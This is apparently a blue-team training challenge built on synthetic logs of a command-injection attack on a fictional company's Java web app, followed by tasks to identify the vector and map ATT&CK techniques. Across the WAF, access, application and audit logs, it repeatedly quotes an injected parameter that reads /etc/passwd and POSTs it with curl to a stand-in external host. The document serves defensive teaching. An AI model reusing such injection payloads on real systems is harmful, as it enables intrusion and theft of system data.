Blueteamfiles • Challenge: Web RCE → /etc/passwd Exfil

Scenario

Company: Asteria Cards Ltd (imaginary)

Alert: WAF anomaly + outbound proxy suggest possible RCE on Internet‑facing Java web app, followed by /etc/passwd access and HTTPS exfil.

Goals: identify vector, reconstruct process chain, confirm access & exfil, map ATT&CK techniques.

Environment (synthetic)

Attacker: 198.51.100.88
VIP (public): 192.0.2.30
Reverse proxy: 192.0.2.31
App host: 10.24.6.31 (app-ws-31.corp.example)
Resolver: 192.0.2.53
Outbound proxy: 192.0.2.50
Exfil domain: store.nimbus-cdn.example → 203.0.113.44

Timer

Elapsed: 00:00

Evidence Tabs

2025-11-19T21:45:12Z 192.0.2.30 WAF NOTICE rule=RCE_CommandInjection phase=2 action=ALLOW(mode=learning)
  client=198.51.100.88 req="GET /api/export?fmt=csv;cat%20/etc/passwd%20>%20/tmp/.s;curl%20-sS%20-X%20POST%20https://store.nimbus-cdn.example/u%20--data-binary%20@/tmp/.s HTTP/1.1"
  ua="Mozilla/5.0 Asteria/2.4" id=910021 tags=[attack,rce,cmd]
2025-11-19T21:45:31Z 192.0.2.30 WAF ALERT  rule=RCE_CommandInjection phase=2 action=BLOCK
  client=198.51.100.88 req="GET /api/export?fmt=tsv;id;uname%20-a" ua="curl/7.85.0" id=910021

198.51.100.88 - - [19/Nov/2025:21:45:12 +0000] "GET /api/export?fmt=csv;cat%20/etc/passwd%20>%20/tmp/.s;curl%20-sS%20-X%20POST%20https://store.nimbus-cdn.example/u%20--data-binary%20@/tmp/.s HTTP/1.1" 200 708 "-" "Mozilla/5.0 Asteria/2.4" x-forwarded-for=198.51.100.88 upstream=10.24.6.31:8080
198.51.100.88 - - [19/Nov/2025:21:45:31 +0000] "GET /api/export?fmt=tsv;id;uname%20-a HTTP/1.1" 403 224 "-" "curl/7.85.0" upstream=BLOCKED_BY_WAF

2025-11-19T21:45:13Z WARN  com.asteria.export.ApiController - Legacy exec path invoked with param 'fmt'
2025-11-19T21:45:13Z INFO  com.asteria.exec.ShellRunner - exec: /bin/sh -c "csv;cat /etc/passwd > /tmp/.s;curl -sS -X POST https://store.nimbus-cdn.example/u --data-binary @/tmp/.s"
2025-11-19T21:45:31Z ERROR com.asteria.exec.ShellRunner - blocked upstream (WAF)

type=EXECVE msg=audit(1732052713.200:501): argc=3 a0="/bin/sh" a1="-c" \
 a2="csv;cat /etc/passwd > /tmp/.s;curl -sS -X POST https://store.nimbus-cdn.example/u --data-binary @/tmp/.s" ppid=1451 pid=3302 exe="/usr/bin/sh" subj=java(1410)
type=PATH  msg=audit(1732052713.205:502): item=0 name="/etc/passwd" inode=123555 dev="sda1" mode=0644 ouid=0 ogid=0 nametype=NORMAL
type=OPEN  msg=audit(1732052713.205:502): fd=3 flags=O_RDONLY path="/etc/passwd" success=yes
type=EXECVE msg=audit(1732052720.118:503): argc=7 a0="curl" a1="-sS" a2="-X" a3="POST" a4="https://store.nimbus-cdn.example/u" a5="--data-binary" a6="@/tmp/.s" ppid=3302 pid=3314 exe="/usr/bin/curl"

2025-11-19T21:45:16Z QUERY  app-ws-31.corp.example A store.nimbus-cdn.example
2025-11-19T21:45:16Z ANSWER store.nimbus-cdn.example 203.0.113.44 TTL=180

2025-11-19T21:45:22Z PROXY ALLOW src=10.24.6.31 suser=svc-app method=POST \
 host=store.nimbus-cdn.example dst=203.0.113.44:443 uri=/u bytes_out=2140 bytes_in=204 \
 ua="curl/7.68.0" tls=TLS1.2 ja3=771,4866-4867-49195,23-43-45-51,0-11-10-35

2025-11-19T21:45:22Z FW ALLOW policy=egress-web src=10.24.6.31 dst=203.0.113.44:443 app=HTTPS bytes=2350

2025-11-19T21:45:23Z ALERT [1:9102001:1] Suspicious POST suggests system file pattern \
 flow=10.24.6.31:48980 -> 203.0.113.44:443 proto=TCP note="low entropy; marker 'root:x:'"

Scenario

Environment (synthetic)

Timer

Evidence Tabs

Tasks

Task 1 — Pinpoint the RCE vector

Task 2 — Select all suspicious log lines

Task 3 — Map MITRE ATT&CK techniques (select all that apply)

Attack Timeline & Correlated Summary

Timeline (UTC)

Correlation — Why each artifact is malicious

ATT&CK Mapping

Kill Chain Phases

Immediate Defensive Actions